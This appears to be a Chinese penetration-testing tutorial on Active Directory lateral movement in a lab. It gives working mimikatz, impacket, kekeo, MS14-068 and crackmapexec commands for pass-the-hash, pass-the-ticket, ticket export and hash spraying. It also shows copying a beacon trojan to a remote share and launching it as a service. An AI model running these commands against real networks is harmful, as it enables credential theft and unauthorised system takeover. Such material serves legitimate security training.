第130天:内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射

环境搭建

这里这个环境继续上一篇文章搭建的环境

案例一:域横向移动-PTH-Mimikatz&NTLM

什么是pth?

PTH = Pass The Hash ,通过密码散列值 ( 通常是 NTLM Hash) 来进行攻击。在域环境中,用户登录计算机时使用的域账号,计算机会用相同本地管理员账号和密码。 因此,如果计算机的本地管理员账号和密码也是相同的,攻击者就可以使用哈希传递的方 法登录到内网主机的其他计算机。另外注意在 Window Server 2012 R2 之前使用到的 密码散列值是 LM 、 NTLM ,在 2012 R2 及其版本之后使用到的密码散列值是 NTLM Hash 。

首先获得一台计算机的权限记得提权到system

抓取明文密码

mimikatz

Mimikatz利用了Windows内核中的某些特性,特别是LSASS(Local Security Authority Subsystem Service)进程,该进程负责处理用户的登录认证。通过模拟系统调用,Mimikatz能够获取到内存中未加密的凭证数据。这使得它在网络安全测试、漏洞评估以及系统管理员的日常工作中扮演着重要角色。

DC1在这台主机登录过,他的hash会记录在本地,可以利用他的hash提权

命令

mimikatz privilege::debug   #开启mimikatz调试
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 
/ntlm:518b98ad4178a53695dc997aa02d455c  #用mimikatz通过hash连接
dir \\192.168.3.32\c$   #访问共享文件

#下载木马执行
copy beacon.exe \\192.168.3.32\c$
sc \\sqlserver create bshell binpath= "c:\4.exe"
sc \\sqlserver start bshell

执行hash连接命令,会在win2008中弹出一个窗口(!注意,这里这条命令不能在提权的system中运行,必须在域内的用户administrator或者别的用户执行,否则是按本地用户是找不到域主机的)

访问共享文件

而普通cmd窗口当中是没有权限进行访问的

设置转发上线

生成木马然后复制到目标主机

添加服务

sc \\192.168.3.10 create bshell binpath= "c:\2.exe"

这里可以写ip也可以写主机名

添加成功

启动服务

sc \\sqlserver start bshell

成功上线system权限

但是要在对方主机执行这些命令显然不现实,这里了解这种方法就好

impacket套件

具体使用方式上一篇文章介绍过

python3 psexec.py -hashes :579da618cfbfa85247acf1f800a280a4 ./administrator@192.168.3.10
python3  smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 /administrator@192.168.3.10
python3  wmiexec.py -hashes :579da618cfbfa85247acf1f800a280a4 /administrator@192.168.3.10

案例二:域横向移动-PTT-漏洞&Kekeo&Ticket

PTT(pass the ticket) # 利用的票据凭证 TGT 进行渗透测试( Kerberos 认证攻击)

ms14-068(利用系统漏洞)

在这篇文章中曾经使用过,这里需要注意一点,这个漏洞适用版本是win2012以下的版本,域控是2019的话也会被检测出来是有危险的操作

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客

MS14-068漏洞是Kerberos协议中的一个安全漏洞,允许用户在向Kerberos密钥分发中心(KDC)申请TGT(票据授权服务产生的身份凭证)时伪造自己的Kerberos票据。如果KDC在处理这些伪造的票据时没有正确验证票据的签名,那么攻击者就可能获得更高的权限。

利用,这里是根据系统漏洞溢出到高权限提权,所以这里我就用域普通用户来运行

whoami/user  #查看sid

查看和清除票据的命令

shell klist    #查看票据 
shell klist::purge    #清除票据

利用工具生成票据,这里本应该设置代理在本地运行,但是是exe文件,我是linux系统所以就先上传了

工具下载地址:

GitCode - 全球开发者的开源社区,开源代码托管平台

注意这里的密码都是自己的,利用自己的低权限身份去提权

利用工具获得票据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
ms14-068.exe -u jie@qq.com -s S-1-5-21-3844935259-2139444640-2602687446-1104 -d 192.168.3.10 -p 123.com

查看生成票据的名字

利用mimikatz导入票据

mimikatz kerberos::ptc TGT_jie@qq.com.ccache

查看当前票据

查看文件

这里需要用主机名进行访问而不能使用ip

Kekeo(利用NTML,高权限)

工具下载地址:Release 2.2.0 20211214 Internals certificate · gentilkiwi/kekeo · GitHub

刚才mimikatz利用域内普通用户就可以提权啊,这个不行必须利用域内管理员用户,但是都已经有高权限用户了还需要这个干啥,鸡肋

抓取密码,如果里面能看到域内管理员的NTML(hash)那么该漏洞可以利用

首先还是需要上传kekeo文件,这里我就不设置代理了还是直接上传

需要清空票据

利用这个工具进行执行生成票据

shell kekeo.exe "tgt::ask /user:administrator /domain:qq.com /ntlm:afffeba176210fad4628f0524bfe1942" "exit"

然后导入票据

shell kekeo.exe "kerberos::ptt TGT_administrator@QQ.COM_krbtgt~qq.com@QQ.COM.kirbi" "exit"

访问共享文件夹

shell dir \\dc1.qq.com\c$

mimikatz(历史ticket)

利用条件是10个小时内,有别的用户连接过这台主机

导出票据(需要system权限去执行,看哪些主机与该主机建立过练习)

mimikatz sekurlsa::tickets /export

清空当前票据

导入票据

选择管理员去尝试

复制文件地址的方式

导入票据

mimikatz kerberos::ptt C:\Windows\system32\[0;5bb95]-2-1-40e00000-administrator@krbtgt-qq.com.kirbi

查看共享文件

如何判断hash是否有效

把用户名写入一个文件夹中,利用工具crackmapexec批量测试

proxychains4 crackmapexec smb 192.168.3.10-30 -u u.txt -H afffeba176210fad4628f0524bfe1942 --continue-on-success

案例三: 域横向移动-PTK-Mimikatz&AES256

利用条件过于苛刻

相关推荐
车载诊断技术1 小时前
电子电气架构 --- 什么是EPS?
网络·人工智能·安全·架构·汽车·需求分析
brrdg_sefg5 小时前
WEB 漏洞 - 文件包含漏洞深度解析
前端·网络·安全
浏览器爱好者6 小时前
谷歌浏览器的网络安全检测工具介绍
chrome·安全
独行soc7 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍11基于XML的SQL注入(XML-Based SQL Injection)
数据库·安全·web安全·漏洞挖掘·sql注入·hw·xml注入
安全方案10 小时前
如何增强网络安全意识?(附培训PPT资料)
网络·安全·web安全
H4_9Y10 小时前
顶顶通呼叫中心中间件mod_cti模块安全增强,预防盗打风险(mod_cti基于FreeSWITCH)
安全·中间件
Hacker_Oldv11 小时前
网络安全中常用浏览器插件、拓展
安全·web安全
hao_wujing13 小时前
网络安全攻防演练中的常见计策
安全·web安全
燕雀安知鸿鹄之志哉.14 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全